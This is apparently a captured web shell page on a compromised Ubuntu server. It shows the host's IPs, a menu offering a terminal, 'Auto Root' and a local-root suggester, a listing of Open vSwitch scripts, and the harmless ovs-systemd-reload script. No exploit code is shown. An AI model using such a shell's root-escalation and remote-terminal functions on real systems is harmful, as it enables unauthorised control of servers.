Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
openvswitch /
scripts /
Delete
Unzip
Name
Size
Permission
Date
Action
ifupdown.sh
3.7
KB
-rwxr-xr-x
2023-06-30 00:51
ovs-bugtool-daemons-ver
872
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-fdb-show
852
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-get-dpdk-nic-numa
977
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-get-port-stats
395
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-ovs-appctl-dpif
919
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-ovs-bridge-datapath-type
834
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-ovs-ofctl-loop-over-bridges
1.24
KB
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-ovs-vswitchd-threads-affinity
825
B
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-qos-configs
1.02
KB
-rwxr-xr-x
2026-03-25 00:13
ovs-bugtool-tc-class-show
981
B
-rwxr-xr-x
2026-03-25 00:13
ovs-check-dead-ifs
2.92
KB
-rwxr-xr-x
2026-03-25 00:13
ovs-ctl
18.49
KB
-rwxr-xr-x
2026-03-25 00:13
ovs-kmod-ctl
5.95
KB
-rwxr-xr-x
2026-03-25 00:13
ovs-lib
21.63
KB
-rw-r--r--
2026-03-25 00:13
ovs-save
5.57
KB
-rwxr-xr-x
2026-03-25 00:13
ovs-systemd-reload
1.13
KB
-rwxr-xr-x
2023-06-30 00:51
Save
Rename
#! /bin/sh # Copyright (c) 2017 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. case $0 in */*) dir0=`echo "$0" | sed 's,/[^/]*$,,'` ;; *) dir0=./ ;; esac . "$dir0/ovs-lib" || exit 1 stop_ovsdb() { systemctl --job-mode=ignore-dependencies stop ovsdb-server } start_ovsdb() { systemctl --job-mode=ignore-dependencies start ovsdb-server } stop_forwarding() { systemctl --job-mode=ignore-dependencies stop ovs-vswitchd } start_forwarding() { systemctl --job-mode=ignore-dependencies start ovs-vswitchd } add_managers() { : } if [ "$1" = "force-reload-kmod" ]; then force_reload_kmod else restart fi exit 0